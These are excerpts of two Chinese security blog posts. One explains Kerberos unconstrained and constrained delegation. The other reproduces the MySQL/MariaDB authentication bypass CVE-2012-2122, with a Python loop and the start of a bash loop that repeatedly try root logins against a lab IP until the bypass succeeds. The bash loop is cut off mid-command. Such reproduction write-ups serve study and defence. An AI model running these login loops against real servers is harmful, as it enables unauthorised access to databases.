ghtwf01

首发先知社区：https://xz.aliyun.com/t/7517什么是委派如果在一个域中，A使用Kerberos身份验证访问服务B，B再使用A的身份去访问C，这个过程就可以理解为委派，委派主要分为非约束委派（Unconstrained delegation）和约束委派（Constrained delegation）两种，只有当A有权限访问C的时候才能委派成功，因为B使用的是A的身份去访问C非约束委派非约束委派在Kerberos中实现时，User会从KDC处得到的TGT发送给委派对象Service1，Service1拿到TGT后可以通过TGT访问域内任意其它服务，所以被称为非约束委派实现流程图如下（图来自微软手册）1.用户通过发送KRB_AS_REQ消息请求可转发 TGT（forwardable TGT，为了方便我们称为TGT1）。 2.KDC在KRB_AS_REP消息中返回TGT1

首发先知社区：https://xz.aliyun.com/t/7392CVE-2012-2122 Mysql身份认证漏洞影响版本Mysql在5.5.24之前MariaDB也差不多这个版本之前漏洞原理只要知道用户名，不断尝试就能够直接登入SQL数据库，按照公告说法大约256次就能够蒙对一次漏洞复现msf利用hash解密得到密码即可登录python exp#!/usr/bin/python import subprocess while 1: subprocess.Popen("mysql -u root -p -h 192.168.0.16 --password=test", shell=True).wait()shell expfor i in `seq 1 1000`; do mysql -u root -p -h 192.168.0.16 --pa